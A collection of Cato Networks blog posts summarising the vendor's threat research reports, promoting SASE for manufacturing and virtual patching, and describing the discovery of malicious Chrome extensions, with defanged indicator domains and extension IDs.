We recently issued the Cato Networks SASE Threat Research Report, which highlights cyber threats and trends based on more than 1.3 trillion flows that passed...
Cato Analyzes the Dominant Sources of Threats in 2H2022 Research Report We recently issued the Cato Networks SASE Threat Research Report, which highlights cyber threats and trends based on more than 1.3 trillion flows that passed through the Cato SASE Cloud network during the second half of 2022. The report highlights the most popular vulnerabilities that threat actors attempted to exploit, and the growing use of consumer applications that may present a risk to the enterprise.
Cato Scans a Vast Trove of Data to Hunt for Threats
One of the first observations in the report was the sheer scale of our data repository. Cato’s convergence of networking and security provides unique visibility on a global scale into both legitimate enterprise network usage and the malicious activity aimed at enterprise networks. This includes hostile network scans, exploitation attempts, and malware communication to C&C servers.
Like many security vendors, we collect information from threat intelligence feeds and other security resources. But as a networking provider, we’re also able enrich our understanding of security events with network flow data often unavailable to security professionals. During 2022, Cato’s data repository was fed by more than 2.1 trillion network flows traversing or our global private backbone or about a 20% growth in flows each quarter.
Security events, threats, and incidents also grew in proportion to the number of network flows. In the second half of 2022, the Cato Threat Hunting System (CTHS) detected 87 billion security events across the entire Cato Cloud. A security event is any network flow that triggers one of Cato’s many security controls.
[boxlink link="https://www.catonetworks.com/resources/eliminate-threat-intelligence-false-positives-with-sase/"] Eliminate Threat Intelligence False Positives with SASE | Download the eBook [/boxlink]
CTHS is a natural extension of Cato Cloud security services. It is comprised of a set of algorithms and procedures developed by Cato Research Labs that dramatically reduces the time to detect threats across enterprise networks. CTHS is not only incredibly accurate but also requires no additional infrastructure on a customer’s network.
CTHS concluded there were 600,000 threats, or high-risk flows, based on machine learning and data correlation. Of these, 71,000 were actual incidents, or verified security threats.
Cato Identifies the Top Threats and Exploit Attempts on the Network
Over the years, Cato has been tracking the top threats on the network and the trends haven’t changed much. The top five threat types in the current research report are (1) Network Scan, at 31.2 billion events, (2) Reputation, at 4.7 billion events, (3) Policy Violation, at 1.3 billion events, (4) Web Application Attack, at 623 million events, and (5) Vulnerability Scan, with 482 million events.
Other types of threats worth noting include Remote Code Execution (92 million), Crypto Mining (56 million), and Malware (55 million). Remote Code Execution events and Malware events both increased over the previous reporting period, but Crypto Mining events decreased. This latter fact may be due to the recent decline in the cryptocurrency business itself following the collapse of the FTX exchange.
The most-used cloud apps in the reporting period were from Microsoft, Google, Apple, Amazon (AWS), and Meta (Facebook). Many consumer-oriented applications were also in use, including YouTube, TikTok, Spotify, Tor, Mega, and BitTorrent. The latter three apps are known to be used frequently for malicious activities and pose a potential risk to enterprise networks.
The Log4j vulnerability (CVE-2022-44228) is a relatively recent discovery that is estimated to have affected nearly a third of all web servers in the world. Thus, it’s no surprise that it continues to dominate exploitation attempts with 65 million events across the Cato Cloud network. What is surprising is that two older vulnerabilities continue to make the top five list for exploit attempts. One is CVE-2017-9841, a remote code execution bug from 2017, and the other is CVE-2009-2445, a 14-year old vulnerability affecting certain popular web servers.
Cato also tracks network flows associated with MITRE ATT&CK techniques. Network based scanning and remote system discovery lead the list with 22.6 billion flows and 17 billion flows, respectively. The top five most-used techniques targeting enterprises are Phishing, Phishing for Information, Scanning, Remote System Discovery, and Exploit Public-facing Application. Knowing which attack techniques are most often seen on the network can help organizations tighten their defenses where it is most needed.
For more detailed information, read the Cato Networks SASE Threat Research Report for the second half of 2022.
Industry 4.0 is revolutionizing the manufacturing industry as we are witnessing numerous innovative technologies such as AI, IoT, and Robotic Process Automation (RPA) helping manufacturers...
SASE in Manufacturing: Overcoming Security and Connectivity Challenges Industry 4.0 is revolutionizing the manufacturing industry as we are witnessing numerous innovative technologies such as AI, IoT, and Robotic Process Automation (RPA) helping manufacturers enhance their supply chain, logistics and production lines. While we see these operations evolving into smart factories, the industry still faces challenges that could adversely impact its ability to realize the full potential of Industry 4.0.
Manufacturing Digital Transformation Challenges
Digital Transformation introduces a number of challenges to the manufacturing industry. These include:
Cybersecurity vulnerabilities - The manufacturing industry is especially vulnerable to cyberattacks. Legacy manufacturing systems were not designed to defend against modern-day cyber attacks. Their legacy architecture makes it difficult to remain current on software patches and fixes, and this exposes them to increased risk of security breaches. Additionally, lacking proper visibility and control of all traffic flows makes it virtually impossible to have a rapid response and remediation of threats to the environment.
Lack of flexible, scalable and reliable architectures - Manufacturers require a flexible, scalable and reliable architecture that can easily and cost-effectively scale as the business grows. This is something that MPLS does not provide because it cannot support the cloud evolution that the manufacturing industry is experiencing. Additionally, global expansion is a major challenge due to the cost and complexity of turning up new sites, especially in locations where MPLS is not easy for carriers to offer and support. And while some may deploy SD-WAN to overcome this, it is not suitable for global use cases, something the industry demands.
Cloud Performance - MPLS makes connecting directly to 3rd party SaaS applications impossible for 2 key reasons: MPLS is a point-to-point technology, whereas SaaS traffic flows between cloud providers, so it is not feasible for cloud use; and, SaaS apps like Microsoft 365, FactoryTalk, SAP and others, require high-performance internet access, and this is something MPLS does not provide.
Complicated tool management - Maintaining and monitoring multiple MPLS connections, telecom vendors, and legacy tools is extremely complicated, frustrating and prone to errors. This becomes even more challenging when integrating technology from acquisitions.
Global disconnect - Most manufacturers have global operations, with their HQ, production, engineering, suppliers and sales dispersed across the globe. All these users need secure, high-performance local, remote and global access to enable the business to run, which is hard to deliver over MPLS.
[boxlink link="https://www.catonetworks.com/resources/firsthand-perspectives-from-5-manufacturing-it-leaders-about-their-sase-experience/"] Firsthand Perspectives from 5 Manufacturing IT Leaders about their SASE Experience | Download the eBook [/boxlink]
The Solution to Manufacturing Challenges: SASE
SASE (Secure Access Service Edge) is an innovative approach to networking and security that converges these technologies into a single, global, cloud-native service that enables enhanced security, consistent policy enforcement, and faster threat response times. With SASE, manufacturers can overcome the above mentioned challenges that plagues many factories during their digital transformation journey.
To support this journey, manufacturers need a new solution: SASE. With SASE, enterprise networking and security technologies are converged into a single cloud-native software stack and delivered over a global backbone where all capabilities operate in unison. SASE allows manufacturers to reduce the risk of cybersecurity breaches while delivering reliable, low latency, global access to applications and systems. The following capabilities are crucial for SASE to deliver on its promise:
A Single Network Architecture
SASE, having its own global backbone, enables authorized users, locations, clouds and applications to reliably and consistently connect at anytime and from anywhere in the world.
The SASE cloud enables IT teams to instantly scale, optimize and enhance the network according to business requirements, and this ensures reliable and predictable performance for applications and a rich experience for all users.
Cloud Data Architecture
SASE optimizes traffic and routes it along the best path to its destinateion based on WAN optimization and dynamic routing policies. This ensures low latency cloud access for all users.
SASE strengthens the security posture by providing all required security capabilities including Zero Trust Network Access (ZTNA), firewall-as-a-service (FWaaS), cloud-access security broker (CASB), DLP and secure web gateway (SWG).
ZTNA in SASE ensures only authenticated and authorized users and devices gain access to critical enterprise business applications. To further extend security protection and coverage, Managed Detection and Response (MDR) is also available.
Consistent Access for Mobile Users and Suppliers
All authorized users receive consistent access, performance, and security no matter where they are.
What’s Next for Manufacturers?
SASE allows manufacturers to focus their time and resources on key business initiatives such as global expansion and enhancing factory operations instead of worrying about IT and security. This allows them to do what they do best, while maintaining peace of mind that their network and security needs are covered.
To learn more about SASE and manufacturing, listen to the podcast episode “How to implement SASE in manufacturing: A discussion with PlayPower”.
A new vulnerability underscores the need for virtual patching. The vulnerability, found in FortiOS, would allow a Remote Code Execution (RCE) attack on multiple firewall...
December 20, 2022
New Critical Vulnerability Underscores the Need for Virtual Patching A new vulnerability underscores the need for virtual patching. The vulnerability, found in FortiOS, would allow a Remote Code Execution (RCE) attack on multiple firewall products as well as FortiGate SSL VPN. The vulnerability has reportedly already been exploited by threat actors. Fortinet has issued a patch for this vulnerability.
The vulnerability, which was initially reported on December 9th, received a score of 9.3 (Critical) and Fortinet has confirmed at least one instance of it being exploited.
Any vulnerability in a system is a potential entry point for a threat actor and must be immediately patched, especially critical vulnerabilities like this one. Threat actors have been known to quickly utilize such vulnerabilities and exploit unpatched systems, while in many cases systems remain unpatched for a very long time giving even the slower-paced adversaries opportunities to exploit them. Vulnerabilities such as Log4j, which coincidently is “celebrating” its one-year birthday, are still being used by different adversaries to target unpatched systems to gain access into networks. Why? Because patching is so hard.
[boxlink link="https://www.catonetworks.com/rapid-cve-mitigation/?utm_medium=blog_top_cta&utm_campaign=rapid_cve_mitigation"] Rapid CVE Mitigation | Cato Security Research [/boxlink]
The Need for Virtual Patching
Having to identify, connect (or physically go to), patch, and test multiple boxes in multiple locations every time a new vulnerability is discovered is no small feat. Organizations need to perform this process very quickly whenever a new vulnerability is discovered as threat actors move quickly on such opportunities.
In addition, adversaries do not shy away from utilizing old vulnerabilities that still work. Log4j is one example but not the only. CISA addressed this in their “Top Routinely Exploited Vulnerabilities” alert, writing, “CISA, ACSC, the NCSC, and FBI assess that public and private organizations worldwide remain vulnerable to compromise from the exploitation of these CVEs. Malicious cyber actors will most likely continue to use older known vulnerabilities, such as CVE-2017-11882 affecting Microsoft Office, as long as they remain effective and systems remain unpatched. Adversaries’ use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known.“
The solution to this problem is a cloud-based security architecture that allows for virtual patching. Virtual patching is defined by OWASP as “A security policy enforcement layer which prevents the exploitation of a known vulnerability. The virtual patch works since the security enforcement layer analyzes transactions and intercepts attacks in transit, so malicious traffic never reaches the web application. The resulting impact of a virtual patch is that, while the actual source code of the application itself has not been modified, the exploitation attempt does not succeed.”
Only a cloud-based security solution eliminates the need to patch box-by-box and effectively enables a “mitigate-once-protect-everywhere" patching strategy.
Log4j is a Java-based, ubiquitous logging tool that is said to be used by nearly 13 billion devices world-wide. Late last year, in December 2021,...
Spring4Shell Might Grab Headlines, But Log4j Exploits Swamped Enterprises, Finds Cato Threat Report Log4j is a Java-based, ubiquitous logging tool that is said to be used by nearly 13 billion devices world-wide. Late last year, in December 2021, the Apache Software Foundation announced the discovery of a software vulnerability (CVE-2021-44228 a.k.a. Log4Shell) that allows unauthenticated users to remotely execute or update software code on multiple applications via web requests. As soon as the vulnerability was announced, researchers at Cato Networks noted over 3 million attempts (in Q4 2021) aimed at exploiting this vulnerability.
Fast forward to Q1 2022 and the number of attempts to exploit this vulnerability have increased to a whopping 24 million. According to the Cato Networks SASE Threat Research Report, Log4j vulnerabilities were leveraged all across the world, including cyber-attacks on Ukrainian organizations.
Interestingly, number two on the list of the top five CVE exploit attempts was a Java vulnerability (CVE-2009-2445) that has been around for more than a decade. Threat actors made almost 900,000 attempts (double than previous quarter) to exploit this vulnerability for initial access. Above research highlights the fact that while certain zero-day vulnerabilities (like Spring4Shell or CVE-2022-22965) grabbed news headlines, it is the legacy vulnerabilities that put enterprises at the most risk.
[boxlink link="https://www.catonetworks.com/cybersecurity-masterclass/?utm_source=blog&utm_medium=top_cta&utm_campaign=masterclass"] Join one of our Cyber Security Masterclasses | Go now [/boxlink]
Majority of Exploitation Events Originated in the U.S.
Understanding where attacks originate from or who (or where) the malware communicates to is a critical part of any organization's threat response strategy. Attackers are aware of the fact that traffic to or from certain countries may be blocked, inspected or investigated and that’s the reason why a majority of them ensure that their command and control (C&C) infrastructure is hosted in a country that is labeled as “safe”. While the U.S. is the most favored destination (hosts 17.3 billion C&C servers), China comes second (with 2 billion C&C servers), followed by Germany (1.66 billion), UK (1.29 billion) and Japan (1 billion).
Reputation-based Threats, Brute Force and Remote Code Execution Attacks Skyrocket
After analyzing 26 billion security events across 350 billion network flows, Cato researchers noted a 33% decline in attackers attempting to perform network scans. That being said, network scans still reign as the number one threat type (10 billion plus attempts), followed by reputation-based threats (1.5 billion attempts) or security events that are triggered by inbound or outbound communications to known malicious destinations.
Reputation-based threats grew more than 100% over the previous quarter. In addition to this, the Cato Threat Hunting System also observed that crypto-mining numbers continue to climb, while brute force attacks and remote code execution attacks have nearly tripled in comparison to the previous quarter.
Attackers Are Frequently Scanning Network Hardware and Software For Initial Access
Cato carried out an analysis based on the MITRE ATT&CK framework and concluded that network-based scanning is the most frequently used attack vector to gain initial access in an enterprise environment. Active Scanning (T1595 - 6.9 billion flows), Network Discovery (T1046 - 4.1 billion flows) and Remote System Discovery (T1018 - 2.7 billion flows) are the top three techniques employed by attackers. That’s not all, once adversaries have initial access they actively search data from local systems (T1005 - 9.5 million incidents), look for valid accounts (T1078 - 6.9 million incidents) and try to brute force access if credentials are not accessible (T1110 - 6.9 million incidents).
Risks Are Also Originating from Popular Consumer Apps Like Telegram and TikTok
While many governments have raised privacy concerns around the use of TikTok and even attempted to censor its use, Cato research finds that most enterprises still continue to allow TikTok flows. In fact, use of this short form video-haring app grew by 10% over the previous quarter. In addition to this, use of the instant-messaging app Telegram more than tripled, probably due to the Ukraine-Russia crisis, and YouTube grew by 25%. Growth in such non-business, consumer apps operating on enterprise networks significantly widens the attack surface, exposing organizations and people to greater risk of being targeted with phishing and other social engineering schemes.
What Can Organizations Do To Protect Themselves?
While security isn’t one-size-fits-all, below are some general recommendations and best practices that can help:
Execute a detailed audit of every website, system and application on a regular basis. Prioritize critical risks and plug those loopholes proactively.Patch all applications regularly and ensure they are running the most up-to-date software.Replace security point solutions and legacy network services with a solution that is more converged (or holistic) like SASE. A convergence of networking and security provides unique visibility into network usage, hostile network scans, exploitation attempts and malware communication to C&C servers.When organizations encounter zero-day vulnerabilities like Log4j, they must immediately implement virtual patching so that security teams can neutralize the threat and buy additional time till they are able to apply necessary and permanent fixes.Train staff regularly so they do not fall prey to phishing and social engineering scams.Try and restrict use of consumer applications (e.g., TikTok, Telegram) in enterprise environments as this can significantly minimize risk and lower possibility of infectious lateral movement.Be vigilant, have reporting and monitoring processes in place and be on guard for any changes in the attack surface.
Follow the link to get the full Q122 Cato Networks SASE Threat Research Report.
Network data from hundreds of Cato customers suggests malware communication persists despite the use of legacy security controls, services, and detection methods Cato Research Labs...
Threat Intelligence Feeds and Endpoint Protection Systems Fail to Detect 24 Malicious Chrome Extensions Network data from hundreds of Cato customers suggests malware communication persists despite the use of legacy security controls, services, and detection methods
Cato Research Labs released new findings today identifying 24 malicious Chrome extensions and 40 malicious domains, all previously thought to be benign. Some extensions simply introduced adware, but others stole user credentials and may allow attackers to exfiltrate data or manipulate search results to lure users into downloading malware. None of the extensions or the domains had been reported as malicious by endpoint protection systems (EPPs) or threat intelligence (TI).
The fact these malicious extensions and domains went undetected underscores the limitations of legacy protection systems. Attackers can employ a wide range of techniques to avoid detection by EPPs and TI. As such, enterprises cannot assume updated defenses will protect them. Putting into place the security measures to detect the C&C server communications of a malicious Chrome extension, or any malware for that matter, will fill this gap.
Browsers: Today's Security Frontier
Everyone uses browsers, and it's this popularity that makes them particularly enticing targets for adversaries. Browser extensions provide fertile ground for attackers to access resources on client computers, often with the same permissions as the browser itself.
Many researchers consider malicious extensions as simply PuPs (Potentially unwanted Programs) or Adware, but malicious extensions can be far riskier than just showing ads. From manipulating search results to luring users to download malware to exfiltrating clipboard data or screenshots, malicious Chrome extensions pose a huge and growing risk for every enterprise. We saw this last fall with the Razy malware outbreak that also involved a Chrome extension.
How Malicious Chrome Extensions Make Their Way Into Your Browser
Google does a good job identifying and blocking malicious Chrome extensions. The process of uploading a new extension to Google's Chrome Web Store typically takes several weeks while the extension code and activity are reviewed automatically and manually by Google. Using the Chrome browser's standard security settings will block the installation of extensions from outside Google's Chrome Web Store. However, users can change this setting in the browser configuration.
Google also reviews abuse notifications from users and removes extensions identified as malicious from the Chrome Web Store. In those cases, the Chrome browser will mark the extension as malware; users are expected to remove the extension.
[caption id="attachment_14066" align="aligncenter" width="411"] Figure 1: The Great Suspender is flagged as an extension that contains malware.[/caption]
Endpoint Protection and Threat Intelligence Research Alone Do Not Detect Malicious Chrome Extensions
With those security controls in place and companies already investing heavily in endpoint protection, you might think that users would be safe from malicious extensions. However, our research shows this is not the case.
Overall, we discovered 85 malicious Chrome extensions on our customer networks. Some had never appeared in the Google Chrome Web Store, while others had been removed by Google. Nevertheless, they were still found operating on customer networks.
How can users continue to run malicious extensions despite the many security controls? During our research, we identified four approaches attackers use to introduce malicious extensions into user browsers:
Browser Configuration and Third-Party Sites: Some extensions enter browsers due to poor browser configuration and downloading CRX (Chrome extension installation file) from malicious sites, i.e., not Google's official web store. One malicious site we identified that distributes malicious CRXs is https://extore[.]space/inspire. Some of the extensions are real and benign, while others might be fake with malicious code.
Malicious Code Injection During Update: In other cases, Google might have approved the extensions, but attackers later injected malicious code in one of the extension's updates after the extension becomes popular.
Extension Rights Acquisition: Other ways are by adversaries purchasing a popular extension's rights from the developer and then injecting malicious code. Taking over the key (which generates the extension ID) and credentials from the developer might also be a way to get plugged into a popular extension.
Independent Code Downloads: We've also identified other Malwares/PUPs or malicious extensions that would download and install additional (other) malicious extensions.
Network-Based Discovery Is Critical for Spotting Malicious Extensions
Cato made these discoveries by analyzing five days of data from hundreds of Cato customers' networks. Rather than hunting for specific malware signatures, Cato uses a network-based approach that identifies the network traffic patterns indicative of all malware. As such, this methodology is not only useful for identifying these specific extensions but for continuously hunting for any malware communicating with a C&C server.
The research had two phases. First, we automatically correlated network traffic with extension behavior and then preliminarily classified extensions as malicious or benign. The result: 97 of 551 unique extensions from our data were identified as likely being malicious. The second phase was to manually inspect each extension, definitively classifying them as malicious or benign. The final result was 85 malicious extensions, representing an 87% success rate for our initial automated phase.
We achieved this remarkably successful approach by analyzing and correlating networking and security information across multiple dimensions, including looking for:
Traffic to Parked or Malicious Domains. Identifying traffic generated by extensions to parked domains or malicious domains typically yielded known malicious extensions. What's more, by checking the network behavior and other traffic data, such as the URL and other HTTP parameters, we were able to identify other malicious extensions that were using the same behavior and communicating with domains previously not classified as malicious.
[caption id="attachment_14072" align="aligncenter" width="660"] Figure 2: Parked domain used as a C&C server[/caption]
Identical Extensions Communicating with Different Domains: Attackers have identical extensions (as defined by their unique extension ID) communicating with many different domains. They'll target a particular area (creating PDFs was particularly popular), labeling each extension differently and having them communicate with a different domain, mimicking a benign extension's behavior. Using the same approach, we analyzed different extensions that communicate to the same domain. This behavior was suspicious, and after analyzing the specific extensions, they were identified as malicious.
Unencrypted Extension IDs: Having the extension ID in clear-text or encoded to base64 in the URL, headers or payload is also suspicious. It may be evidence of the adversaries trying to understand the traffic origin (as sometimes they share the same domain across many extensions). It might also be used as an access-control function on the server-side to allow traffic only from the extension and not from security researchers or automatic web-classification algorithms trying to investigate and classify the domain.
Fake Postman Extension Leads to Credential Theft
While our approach identified many extensions that were believed to be benign, of particular note was one extension that disguised itself as the popular Postman application.
Postman allows developers to test and use APIs, typically using their credentials in the process. The fake Postman extension enables attackers to exploit those credentials to access the company's application. To make matters worse, the malicious extension closely mimics the real Postman extension, even using the same icon and offering the same capabilities.
[caption id="attachment_14074" align="aligncenter" width="452"] Figure 3: Fake Postman extension download[/caption]
[caption id="attachment_14076" align="aligncenter" width="192"] Figure 4: Obfuscated JS code in the Postman copycat extension. The variable p returns https://secure.browser-status[.]com/__utm.gif, which is a tracking pixel.[/caption]
Recommendations for Organizations
Cato recommends taking several actions to protect your users from these and other malicious extensions:
Define and maintain a whitelist policy of extensions ID allowed in your organization. Ensure whitelisted extensions are from Google's Chrome Web Store only.
Monitor for browsers with poor security settings (lower than "Standard").
Monitor network traffic to identify periodic communication with C&C servers.
Despite their investment in EPP and TI, enterprises continue to be infected by malicious Chrome extensions. Attackers introduce the extensions through a range of techniques bypassing legacy protection approaches. However, rather than hunting for a specific malicious extension, enterprises can best protect themselves by identifying the unique network patterns indicative of all malware.
djdcfiocijfjponepmbbdmbeblofhfff (Fake Postman)
mfdcjdgkcepgfcfgbadbekokbnlifbko (Fake Postman)
mgkmlkgpnffmhhfallpoknfmmkdkfejp (QuickNewsWorld Promos)
pdlfbopkggkgdmgkejgjgnbdbmfcnfjn (EZPackageTracking Promos)
ljnppgaebjnbbahgmjajfbcoabdpopfb (Search Manager)
nofdiclilfkicekdajkiaieafeciemlh (Your Docs To PDF)